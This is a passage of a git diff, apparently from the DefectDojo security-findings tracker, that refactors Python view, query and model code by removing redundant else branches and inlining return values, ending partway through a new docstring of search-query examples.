request_response_pairs = self.get_valid_request_response_pairs() # Determine how many to return if request_response_pairs.count() >= 3: return request_response_pairs[0:3] - elif request_response_pairs.count() > 0: + if request_response_pairs.count() > 0: return request_response_pairs + return None def get_request(self): # Get the list of request response pairs that are non empty @@ -3163,8 +3140,7 @@ def get_response(self): reqres = request_response_pairs.first() res = base64.b64decode(reqres.burpResponseBase64) # Removes all blank lines - res = re.sub(r"\n\s*\n", "\n", res) - return res + return re.sub(r"\n\s*\n", "\n", res) def latest_note(self): if self.notes.all(): @@ -3250,8 +3226,7 @@ def 
bitbucket_standalone_prepare_scm_base_link(self, uri): project = parts_project[0] if project.startswith("~"): return parts_scm[0] + "/users/" + parts_project[0][1:] + "/repos/" + parts_project[1] + "/browse" - else: - return parts_scm[0] + "/projects/" + parts_project[0] + "/repos/" + parts_project[1] + "/browse" + return parts_scm[0] + "/projects/" + parts_project[0] + "/repos/" + parts_project[1] + "/browse" def bitbucket_standalone_prepare_scm_link(self, uri): # if commit hash or branch/tag is set for engagement/test - @@ -3336,9 +3311,7 @@ def vulnerability_ids(self): vulnerability_ids = [self.cve] # Remove duplicates - vulnerability_ids = list(dict.fromkeys(vulnerability_ids)) - - return vulnerability_ids + return list(dict.fromkeys(vulnerability_ids)) def inherit_tags(self, potentially_existing_tags): # get a copy of the tags to be inherited @@ -3526,9 +3499,8 @@ def get_absolute_url(self): return reverse("edit_template", args=[str(self.id)]) def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": reverse("view_template", args=(self.id,))}] - return bc @cached_property def vulnerability_ids(self): @@ -3549,9 +3521,7 @@ def vulnerability_ids(self): vulnerability_ids = [self.cve] # Remove duplicates - vulnerability_ids = list(dict.fromkeys(vulnerability_ids)) - - return vulnerability_ids + return list(dict.fromkeys(vulnerability_ids)) class Vulnerability_Id_Template(models.Model): @@ -3599,10 +3569,9 @@ class Check_List(models.Model): def get_status(pass_fail): if pass_fail == "Pass": return "success" - elif pass_fail == "Fail": + if pass_fail == "Fail": return "danger" - else: - return "warning" + return "warning" def get_breadcrumb(self): bc = self.engagement.get_breadcrumb() @@ -3623,8 +3592,7 @@ def get_request(self): def get_response(self): res = str(base64.b64decode(self.burpResponseBase64), errors="ignore") # Removes all blank lines - res = re.sub(r"\n\s*\n", "\n", res) - return res + return re.sub(r"\n\s*\n", "\n", res) class Risk_Acceptance(models.Model): @@ -3880,16 +3848,15 @@ def false_positive_resolutions(self): def get_priority(self, status): if status == "Info": return self.info_mapping_severity - elif status == "Low": + if status == "Low": return self.low_mapping_severity - elif status == "Medium": + if status == "Medium": return self.medium_mapping_severity - elif status == "High": + if status == "High": return self.high_mapping_severity - elif status == "Critical": + if status == "Critical": return self.critical_mapping_severity - else: - return "N/A" + return "N/A" # declare form here as we can't import forms.py due to circular imports not even locally @@ -4599,8 +4566,7 @@ class ChoiceAnswer(Answer): def __str__(self): if len(self.answer.all()): return str(self.answer.all()[0]) - else: - return "No Response" + return "No Response" if settings.ENABLE_AUDITLOG: diff --git a/dojo/notes/views.py b/dojo/notes/views.py index a5947971b8a..6dfca7895d1 100644 --- a/dojo/notes/views.py +++ b/dojo/notes/views.py @@ -123,11 +123,10 @@ def edit_note(request, id, page, objid): _("Note edited."), extra_tags="alert-success") return HttpResponseRedirect(reverse(reverse_url, args=(object_id, ))) - else: - messages.add_message(request, - messages.SUCCESS, - _("Note was not succesfully edited."), - extra_tags="alert-danger") + messages.add_message(request, + messages.SUCCESS, + _("Note was not succesfully edited."), + extra_tags="alert-danger") else: if note_type_activation: form = TypedNoteForm(available_note_types=available_note_types, 
instance=note) @@ -195,5 +194,4 @@ def find_available_notetypes(finding, editing_note): available_note_types.append(note_type_id) available_note_types.append(editing_note.note_type_id) available_note_types = list(set(available_note_types)) - queryset = Note_Type.objects.filter(id__in=available_note_types).order_by("-id") - return queryset + return Note_Type.objects.filter(id__in=available_note_types).order_by("-id") diff --git a/dojo/notifications/helper.py b/dojo/notifications/helper.py index 9acbf94d215..ce3f52bf1a5 100644 --- a/dojo/notifications/helper.py +++ b/dojo/notifications/helper.py @@ -343,14 +343,13 @@ def webhooks_notification_request(endpoint, event, *args, **kwargs): timeout = get_system_setting("webhooks_notifications_timeout") - res = requests.request( + return requests.request( method="POST", url=endpoint.url, headers=headers, json=data, timeout=timeout, ) - return res def test_webhooks_notification(endpoint): @@ -522,18 +521,17 @@ def get_slack_user_id(user_email): logger.error("Slack is complaining. See error message below.") logger.error(user) raise RuntimeError("Error getting user list from Slack: " + res.text) - else: - if "email" in user["user"]["profile"]: - if user_email == user["user"]["profile"]["email"]: - if "id" in user["user"]: - user_id = user["user"]["id"] - logger.debug(f"Slack user ID is {user_id}") - slack_user_is_found = True - else: - logger.warning(f"A user with email {user_email} could not be found in this Slack workspace.") - - if not slack_user_is_found: - logger.warning("The Slack user was not found.") + if "email" in user["user"]["profile"]: + if user_email == user["user"]["profile"]["email"]: + if "id" in user["user"]: + user_id = user["user"]["id"] + logger.debug(f"Slack user ID is {user_id}") + slack_user_is_found = True + else: + logger.warning(f"A user with email {user_email} could not be found in this Slack workspace.") + + if not slack_user_is_found: + logger.warning("The Slack user was not found.") return user_id diff --git a/dojo/notifications/views.py b/dojo/notifications/views.py index 6a2495330d7..7fe5562ee7e 100644 --- a/dojo/notifications/views.py +++ b/dojo/notifications/views.py @@ -158,8 +158,7 @@ def get_form( ) -> NotificationsWebhookForm: if request.method == "POST": return NotificationsWebhookForm(request.POST, is_superuser=request.user.is_superuser, **kwargs) - else: - return NotificationsWebhookForm(is_superuser=request.user.is_superuser, **kwargs) + return NotificationsWebhookForm(is_superuser=request.user.is_superuser, **kwargs) def preprocess_request(self, request: HttpRequest): # Check Webhook notifications are enabled @@ -182,10 +181,9 @@ def get_initial_context(self, request: HttpRequest, nwhs: Notification_Webhooks) } def get_notification_webhooks(self, request: HttpRequest): - nwhs = Notification_Webhooks.objects.all().order_by("name") + return Notification_Webhooks.objects.all().order_by("name") # TODO: finished pagination # TODO: restrict based on user - not only superadmins have access and they see everything - return nwhs def get(self, request: HttpRequest): # Run common checks @@ -377,8 +375,7 @@ def get_form( ) -> NotificationsWebhookForm: if request.method == "POST": return DeleteNotificationsWebhookForm(request.POST, **kwargs) - else: - return DeleteNotificationsWebhookForm(**kwargs) + return DeleteNotificationsWebhookForm(**kwargs) def get_initial_context(self, request: HttpRequest, nwh: Notification_Webhooks): return { diff --git a/dojo/object/views.py b/dojo/object/views.py index 
dfb4f590556..0cca584b0be 100644 --- a/dojo/object/views.py +++ b/dojo/object/views.py @@ -30,14 +30,14 @@ def new_object(request, pid): "Added Tracked File to a Product", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_objects", args=(pid,))) - else: - tform = ObjectSettingsForm() - product_tab = Product_Tab(prod, title="Add Tracked Files to a Product", tab="settings") + return None + tform = ObjectSettingsForm() + product_tab = Product_Tab(prod, title="Add Tracked Files to a Product", tab="settings") - return render(request, "dojo/new_object.html", - {"tform": tform, - "product_tab": product_tab, - "pid": prod.id}) + return render(request, "dojo/new_object.html", + {"tform": tform, + "product_tab": product_tab, + "pid": prod.id}) @user_is_authorized(Product, Permissions.Product_Tracking_Files_View, "pid") @@ -101,8 +101,7 @@ def delete_object(request, pid, ttid): "Tracked Product Files Deleted.", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_objects", args=(pid,))) - else: - tform = DeleteObjectsSettingsForm(instance=object) + tform = DeleteObjectsSettingsForm(instance=object) product_tab = Product_Tab(product, title="Delete Product Tool Configuration", tab="settings") return render(request, diff --git a/dojo/pipeline.py b/dojo/pipeline.py index ea020d2d926..ee2dc0ae186 100644 --- a/dojo/pipeline.py +++ b/dojo/pipeline.py @@ -31,7 +31,7 @@ def social_uid(backend, details, response, *args, **kwargs): "first_name": first_name, "last_name": last_name, "uid": uid} - elif settings.GOOGLE_OAUTH_ENABLED and isinstance(backend, GoogleOAuth2): + if settings.GOOGLE_OAUTH_ENABLED and isinstance(backend, GoogleOAuth2): """Return user details from Google account""" if "sub" in response: google_uid = response["sub"] @@ -51,15 +51,13 @@ def social_uid(backend, details, response, *args, **kwargs): "first_name": first_name, "last_name": last_name, "uid": google_uid} - else: - uid = backend.get_user_id(details, response) - # Used for most backends - if uid: - return {"uid": uid} - # Until OKTA PR in social-core is merged - # This modified way needs to work - else: - return {"uid": response.get("preferred_username")} + uid = backend.get_user_id(details, response) + # Used for most backends + if uid: + return {"uid": uid} + # Until OKTA PR in social-core is merged + # This modified way needs to work + return {"uid": response.get("preferred_username")} def modify_permissions(backend, uid, user=None, social=None, *args, **kwargs): @@ -107,8 +105,7 @@ def update_azure_groups(backend, uid, user=None, social=None, *args, **kwargs): def is_group_id(group): if re.search(r"^[a-zA-Z0-9]{8,}-[a-zA-Z0-9]{4,}-[a-zA-Z0-9]{4,}-[a-zA-Z0-9]{4,}-[a-zA-Z0-9]{12,}$", group): return True - else: - return False + return False def assign_user_to_groups(user, group_names, social_provider): @@ -183,7 +180,6 @@ def sanitize_username(username): def create_user(strategy, details, backend, user=None, *args, **kwargs): if not settings.SOCIAL_AUTH_CREATE_USER: - return - else: - details["username"] = sanitize_username(details.get("username")) - return social_core.pipeline.user.create_user(strategy, details, backend, user, args, kwargs) + return None + details["username"] = sanitize_username(details.get("username")) + return social_core.pipeline.user.create_user(strategy, details, backend, user, args, kwargs) diff --git a/dojo/product/queries.py b/dojo/product/queries.py index 8d562c0f9a4..0be35276ffe 100644 --- a/dojo/product/queries.py +++ b/dojo/product/queries.py @@ -59,20 +59,17 @@ def 
get_authorized_products(permission, user=None): member=Exists(authorized_product_roles), prod_type__authorized_group=Exists(authorized_product_type_groups), authorized_group=Exists(authorized_product_groups)).order_by("name") - products = products.filter( + return products.filter( Q(prod_type__member=True) | Q(member=True) | Q(prod_type__authorized_group=True) | Q(authorized_group=True)) - return products - def get_authorized_members_for_product(product, permission): user = get_current_user() if user.is_superuser or user_has_permission(user, product, permission): return Product_Member.objects.filter(product=product).order_by("user__first_name", "user__last_name").select_related("role", "user") - else: - return None + return None def get_authorized_groups_for_product(product, permission): @@ -81,8 +78,7 @@ def get_authorized_groups_for_product(product, permission): if user.is_superuser or user_has_permission(user, product, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Group.objects.filter(product=product, group__in=authorized_groups).order_by("group__name").select_related("role") - else: - return None + return None def get_authorized_product_members(permission): @@ -164,12 +160,10 @@ def get_authorized_app_analysis(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - app_analysis = app_analysis.filter( + return app_analysis.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return app_analysis - def get_authorized_dojo_meta(permission): user = get_current_user() @@ -246,7 +240,7 @@ def get_authorized_dojo_meta(permission): finding__test__engagement__product__prod_type__authorized_group=Exists(finding_authorized_product_type_groups), finding__test__engagement__product__authorized_group=Exists(finding_authorized_product_groups), ).order_by("id") - dojo_meta = dojo_meta.filter( + return dojo_meta.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) @@ -260,8 +254,6 @@ def get_authorized_dojo_meta(permission): | Q(finding__test__engagement__product__prod_type__authorized_group=True) | Q(finding__test__engagement__product__authorized_group=True)) - return dojo_meta - def get_authorized_languages(permission): user = get_current_user() @@ -297,12 +289,10 @@ def get_authorized_languages(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - languages = languages.filter( + return languages.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return languages - def get_authorized_engagement_presets(permission): user = get_current_user() @@ -338,12 +328,10 @@ def get_authorized_engagement_presets(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - engagement_presets = engagement_presets.filter( + return engagement_presets.filter( Q(product__prod_type__member=True) | Q(product__member=True) | 
Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return engagement_presets - def get_authorized_product_api_scan_configurations(permission): user = get_current_user() @@ -379,8 +367,6 @@ def get_authorized_product_api_scan_configurations(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - product_api_scan_configurations = product_api_scan_configurations.filter( + return product_api_scan_configurations.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return product_api_scan_configurations diff --git a/dojo/product/views.py b/dojo/product/views.py index e887938d450..6680c2e5340 100644 --- a/dojo/product/views.py +++ b/dojo/product/views.py @@ -349,11 +349,10 @@ def identify_view(request): return view msg = 'invalid view, view must be "Endpoint" or "Finding"' raise ValueError(msg) - else: - if get_data.get("finding__severity", None): - return "Endpoint" - elif get_data.get("false_positive", None): - return "Endpoint" + if get_data.get("finding__severity", None): + return "Endpoint" + if get_data.get("false_positive", None): + return "Endpoint" referer = request.META.get("HTTP_REFERER", None) if referer: if referer.find("type=Endpoint") > -1: @@ -904,9 +903,8 @@ def new_product(request, ptid=None): if not error: return HttpResponseRedirect(reverse("view_product", args=(product.id,))) - else: - # engagement was saved, but JIRA errors, so goto edit_product - return HttpResponseRedirect(reverse("edit_product", args=(product.id,))) + # engagement was saved, but JIRA errors, so goto edit_product + return HttpResponseRedirect(reverse("edit_product", args=(product.id,))) else: if get_system_setting("enable_jira"): jira_project_form = JIRAProjectForm() @@ -1029,9 +1027,8 @@ def delete_product(request, pid): extra_tags="alert-success") logger.debug("delete_product: POST RETURN") return HttpResponseRedirect(reverse("product")) - else: - logger.debug("delete_product: POST INVALID FORM") - logger.error(form.errors) + logger.debug("delete_product: POST INVALID FORM") + logger.error(form.errors) logger.debug("delete_product: GET") @@ -1104,16 +1101,13 @@ def new_eng_for_app(request, pid, cicd=False): if not error: if "_Add Tests" in request.POST: return HttpResponseRedirect(reverse("add_tests", args=(engagement.id,))) - elif "_Import Scan Results" in request.POST: + if "_Import Scan Results" in request.POST: return HttpResponseRedirect(reverse("import_scan_results", args=(engagement.id,))) - else: - return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id,))) - else: - # engagement was saved, but JIRA errors, so goto edit_engagement - logger.debug("new_eng_for_app: jira errors") - return HttpResponseRedirect(reverse("edit_engagement", args=(engagement.id,))) - else: - logger.debug(form.errors) + return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id,))) + # engagement was saved, but JIRA errors, so goto edit_engagement + logger.debug("new_eng_for_app: jira errors") + return HttpResponseRedirect(reverse("edit_engagement", args=(engagement.id,))) + logger.debug(form.errors) else: form = EngForm(initial={"lead": request.user, "target_start": timezone.now().date(), "target_end": timezone.now().date() + timedelta(days=7), "product": product}, cicd=cicd, @@ -1223,8 +1217,7 
@@ def add_meta_data(request, pid): extra_tags="alert-success") if "add_another" in request.POST: return HttpResponseRedirect(reverse("add_meta_data", args=(pid,))) - else: - return HttpResponseRedirect(reverse("view_product", args=(pid,))) + return HttpResponseRedirect(reverse("view_product", args=(pid,))) else: form = DojoMetaDataForm() @@ -1288,12 +1281,11 @@ def get_engagement(self, product: Product): def get_test(self, engagement: Engagement, test_type: Test_Type): if test := Test.objects.filter(engagement=engagement).first(): return test - else: - return Test.objects.create( - engagement=engagement, - test_type=test_type, - target_start=timezone.now(), - target_end=timezone.now()) + return Test.objects.create( + engagement=engagement, + test_type=test_type, + target_start=timezone.now(), + target_end=timezone.now()) def create_nested_objects(self, product: Product): engagement = self.get_engagement(product) @@ -1406,9 +1398,8 @@ def process_finding_form(self, request: HttpRequest, test: Test, context: dict): finding.save() return finding, request, True - else: - add_error_message_to_response("The form has errors, please correct them below.") - add_field_errors_to_response(context["form"]) + add_error_message_to_response("The form has errors, please correct them below.") + add_field_errors_to_response(context["form"]) return finding, request, False @@ -1451,8 +1442,7 @@ def process_jira_form(self, request: HttpRequest, finding: Finding, context: dic ) return request, True, push_to_jira - else: - add_field_errors_to_response(context["jform"]) + add_field_errors_to_response(context["jform"]) return request, False, False @@ -1464,8 +1454,7 @@ def process_github_form(self, request: HttpRequest, finding: Finding, context: d add_external_issue(finding, "github") return request, True - else: - add_field_errors_to_response(context["gform"]) + add_field_errors_to_response(context["gform"]) return request, False @@ -1537,10 +1526,8 @@ def post(self, request: HttpRequest, product_id: int): if success: if "_Finished" in request.POST: return HttpResponseRedirect(reverse("view_test", args=(test.id,))) - else: - return HttpResponseRedirect(reverse("add_findings", args=(test.id,))) - else: - context["form_error"] = True + return HttpResponseRedirect(reverse("add_findings", args=(test.id,))) + context["form_error"] = True # Render the form return render(request, self.get_template(), context) @@ -1720,8 +1707,7 @@ def edit_product_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id,))) - else: - return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) + return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) product_tab = Product_Tab(member.product, title=_("Edit Product Member"), tab="settings") return render(request, "dojo/edit_product_member.html", { "memberid": memberid, @@ -1745,11 +1731,9 @@ def delete_product_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id,))) - else: - if user == request.user: - return HttpResponseRedirect(reverse("product")) - else: - return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) + if user == request.user: + return HttpResponseRedirect(reverse("product")) + return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) product_tab = 
Product_Tab(member.product, title=_("Delete Product Member"), tab="settings") return render(request, "dojo/delete_product_member.html", { "memberid": memberid, @@ -1781,8 +1765,7 @@ def add_api_scan_configuration(request, pid): extra_tags="alert-success") if "add_another" in request.POST: return HttpResponseRedirect(reverse("add_api_scan_configuration", args=(pid,))) - else: - return HttpResponseRedirect(reverse("view_api_scan_configurations", args=(pid,))) + return HttpResponseRedirect(reverse("view_api_scan_configurations", args=(pid,))) except Exception as e: logger.exception(e) messages.add_message(request, @@ -1879,8 +1862,7 @@ def delete_api_scan_configuration(request, pid, pascid): _("API Scan Configuration deleted."), extra_tags="alert-success") return HttpResponseRedirect(reverse("view_api_scan_configurations", args=(pid,))) - else: - form = DeleteProduct_API_Scan_ConfigurationForm(instance=product_api_scan_configuration) + form = DeleteProduct_API_Scan_ConfigurationForm(instance=product_api_scan_configuration) product_tab = Product_Tab(get_object_or_404(Product, id=pid), title=_("Delete Tool Configuration"), tab="settings") return render(request, @@ -1914,8 +1896,7 @@ def edit_product_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id,))) - else: - return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) + return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) product_tab = Product_Tab(group.product, title=_("Edit Product Group"), tab="settings") return render(request, "dojo/edit_product_group.html", { @@ -1940,10 +1921,9 @@ def delete_product_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id,))) - else: - # TODO: If user was in the group that was deleted and no longer has access, redirect back to product listing - # page - return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) + # TODO: If user was in the group that was deleted and no longer has access, redirect back to product listing + # page + return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) product_tab = Product_Tab(group.product, title=_("Delete Product Group"), tab="settings") return render(request, "dojo/delete_product_group.html", { diff --git a/dojo/product_type/queries.py b/dojo/product_type/queries.py index 737584a5b05..5129cfd789b 100644 --- a/dojo/product_type/queries.py +++ b/dojo/product_type/queries.py @@ -35,9 +35,7 @@ def get_authorized_product_types(permission): product_types = Product_Type.objects.annotate( member=Exists(authorized_roles), authorized_group=Exists(authorized_groups)).order_by("name") - product_types = product_types.filter(Q(member=True) | Q(authorized_group=True)) - - return product_types + return product_types.filter(Q(member=True) | Q(authorized_group=True)) def get_authorized_members_for_product_type(product_type, permission): @@ -45,8 +43,7 @@ def get_authorized_members_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): return Product_Type_Member.objects.filter(product_type=product_type).order_by("user__first_name", "user__last_name").select_related("role", "product_type", "user") - else: - return None + return None def get_authorized_groups_for_product_type(product_type, permission): @@ -55,8 
+52,7 @@ def get_authorized_groups_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Type_Group.objects.filter(product_type=product_type, group__in=authorized_groups).order_by("group__name").select_related("role", "group") - else: - return None + return None def get_authorized_product_type_members(permission): diff --git a/dojo/product_type/views.py b/dojo/product_type/views.py index 302aa6dbbf9..63c38d8df4d 100644 --- a/dojo/product_type/views.py +++ b/dojo/product_type/views.py @@ -242,8 +242,7 @@ def edit_product_type_member(request, memberid): extra_tags="alert-warning") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) + return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) if member.role.is_owner and not user_has_permission(request.user, member.product_type, Permissions.Product_Type_Member_Add_Owner): messages.add_message(request, messages.WARNING, @@ -257,8 +256,7 @@ def edit_product_type_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) + return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) add_breadcrumb(title=page_name, top_level=False, request=request) return render(request, "dojo/edit_product_type_member.html", { "name": page_name, @@ -292,11 +290,9 @@ def delete_product_type_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - if user == request.user: - return HttpResponseRedirect(reverse("product_type")) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) + if user == request.user: + return HttpResponseRedirect(reverse("product_type")) + return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) add_breadcrumb(title=page_name, top_level=False, request=request) return render(request, "dojo/delete_product_type_member.html", { "name": page_name, @@ -365,8 +361,7 @@ def edit_product_type_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id,))) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id,))) + return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id,))) add_breadcrumb(title=page_name, top_level=False, request=request) return render(request, "dojo/edit_product_type_group.html", { @@ -392,10 +387,9 @@ def delete_product_type_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id, ))) - else: - # TODO: If user was in the group that was deleted and no longer has access, redirect them to the product - # types page - return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id, ))) + # TODO: If user was in the group that was deleted and no longer has 
access, redirect them to the product + # types page + return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id, ))) add_breadcrumb(page_name, top_level=False, request=request) return render(request, "dojo/delete_product_type_group.html", { diff --git a/dojo/regulations/views.py b/dojo/regulations/views.py index f4d5004d074..e9a5f1a9f55 100644 --- a/dojo/regulations/views.py +++ b/dojo/regulations/views.py @@ -45,7 +45,7 @@ def edit_regulations(request, ttid): "Regulation Deleted.", extra_tags="alert-success") return HttpResponseRedirect(reverse("regulations")) - elif request.method == "POST": + if request.method == "POST": tform = RegulationForm(request.POST, instance=regulation) if tform.is_valid(): tform.save() diff --git a/dojo/remote_user.py b/dojo/remote_user.py index 44355d9f453..764af4e548b 100644 --- a/dojo/remote_user.py +++ b/dojo/remote_user.py @@ -20,32 +20,28 @@ def authenticate(self, request): self.header = settings.AUTH_REMOTEUSER_USERNAME_HEADER if self.header in request.META: return super().authenticate(request) - else: - return None - else: - logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", - IPAddress(request.META["REMOTE_ADDR"]), - settings.AUTH_REMOTEUSER_TRUSTED_PROXY) return None + logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", + IPAddress(request.META["REMOTE_ADDR"]), + settings.AUTH_REMOTEUSER_TRUSTED_PROXY) + return None class RemoteUserMiddleware(OriginalRemoteUserMiddleware): def process_request(self, request): if not settings.AUTH_REMOTEUSER_ENABLED: - return + return None # process only if request is comming from the trusted proxy node if IPAddress(request.META["REMOTE_ADDR"]) in settings.AUTH_REMOTEUSER_TRUSTED_PROXY: self.header = settings.AUTH_REMOTEUSER_USERNAME_HEADER if self.header in request.META: return super().process_request(request) - else: - return - else: - logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", - IPAddress(request.META["REMOTE_ADDR"]), - settings.AUTH_REMOTEUSER_TRUSTED_PROXY) - return + return None + logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", + IPAddress(request.META["REMOTE_ADDR"]), + settings.AUTH_REMOTEUSER_TRUSTED_PROXY) + return None class PersistentRemoteUserMiddleware(RemoteUserMiddleware): diff --git a/dojo/reports/views.py b/dojo/reports/views.py index ca13eae54ca..aacf4369333 100644 --- a/dojo/reports/views.py +++ b/dojo/reports/views.py @@ -122,8 +122,7 @@ def post(self, request: HttpRequest) -> HttpResponse: if form.is_valid(): self._set_state(request) return render(request, self.get_template(), self.get_context()) - else: - raise PermissionDenied + raise PermissionDenied def _set_state(self, request: HttpRequest): self.request = request @@ -154,8 +153,7 @@ def get_form(self, request): def get_template(self): if self.report_format == "HTML": return "dojo/custom_html_report.html" - else: - raise PermissionDenied + raise PermissionDenied def get_context(self): return { @@ -310,8 +308,7 @@ def product_endpoint_report(request, pid): "user": request.user, "title": "Generate Report", }) - else: - raise Http404 + raise Http404 product_tab = Product_Tab(product, "Product Endpoint Report", tab="endpoints") return render(request, @@ -351,9 +348,8 @@ def generate_report(request, obj, host_view=False): if obj is None: msg = "No object is given to generate report for" raise Exception(msg) - else: - msg = f"Report cannot be generated 
for object of type {type(obj).__name__}" - raise Exception(msg) + msg = f"Report cannot be generated for object of type {type(obj).__name__}" + raise Exception(msg) report_format = request.GET.get("report_type", "HTML") include_finding_notes = int(request.GET.get("include_finding_notes", 0)) @@ -584,8 +580,7 @@ def generate_report(request, obj, host_view=False): "context": context, }) - else: - raise Http404 + raise Http404 paged_findings = get_page_items(request, findings.qs.distinct().order_by("numerical_severity"), 25) product_tab = None @@ -654,9 +649,8 @@ def get_findings(request): if not url: msg = "Please use the report button when viewing findings" raise Http404(msg) - else: - if url.startswith("url="): - url = url[4:] + if url.startswith("url="): + url = url[4:] views = ["all", "open", "inactive", "verified", "closed", "accepted", "out_of_scope", diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py index a1d628b33df..3ebbe9bf6a4 100644 --- a/dojo/risk_acceptance/helper.py +++ b/dojo/risk_acceptance/helper.py @@ -201,16 +201,14 @@ def accepted_message_creator(risk_acceptance, heads_up_days=0): escape_for_jira(risk_acceptance.name), get_full_url(reverse("view_risk_acceptance", args=(risk_acceptance.engagement.id, risk_acceptance.id))), len(risk_acceptance.accepted_findings.all()), timezone.localtime(risk_acceptance.expiration_date).strftime("%b %d, %Y")) - else: - return "Finding has been risk accepted" + return "Finding has been risk accepted" def unaccepted_message_creator(risk_acceptance, heads_up_days=0): if risk_acceptance: return "finding was unaccepted/deleted from risk acceptance [({})|{}]".format(escape_for_jira(risk_acceptance.name), get_full_url(reverse("view_risk_acceptance", args=(risk_acceptance.engagement.id, risk_acceptance.id)))) - else: - return "Finding is no longer risk accepted" + return "Finding is no longer risk accepted" def post_jira_comment(finding, message_factory, heads_up_days=0): diff --git a/dojo/risk_acceptance/queries.py b/dojo/risk_acceptance/queries.py index 9cbf89fb5c2..72282af21e7 100644 --- a/dojo/risk_acceptance/queries.py +++ b/dojo/risk_acceptance/queries.py @@ -39,8 +39,6 @@ def get_authorized_risk_acceptances(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - risk_acceptances = risk_acceptances.filter( + return risk_acceptances.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return risk_acceptances diff --git a/dojo/search/views.py b/dojo/search/views.py index 3e3a75923ca..604e9ecd68c 100644 --- a/dojo/search/views.py +++ b/dojo/search/views.py @@ -31,6 +31,45 @@ def simple_search(request): + + """ + query: some keywords + operators: {} + keywords: ['some', 'keywords'] + + query: some key-word + operators: {} + keywords: ['some', 'key-word'] + + query: keyword with "space inside" + operators: {} + keywords: ['keyword', 'with', 'space inside'] + + query: tag:anchore word tags:php + operators: {'tag': ['anchore'], 'tags': ['php']} + keywords: ['word'] + + query: tags:php,magento + operators: {'tags': ['php,magento']} + keywords: [] + + query: tags:php tags:magento + operators: {'tags': ['php', 'magento']} + keywords: [] + + query: tags:"php, magento" + operators: {'tags': ['php, magento']} + keywords: [] + + query: tags:anchorse some "space inside" 
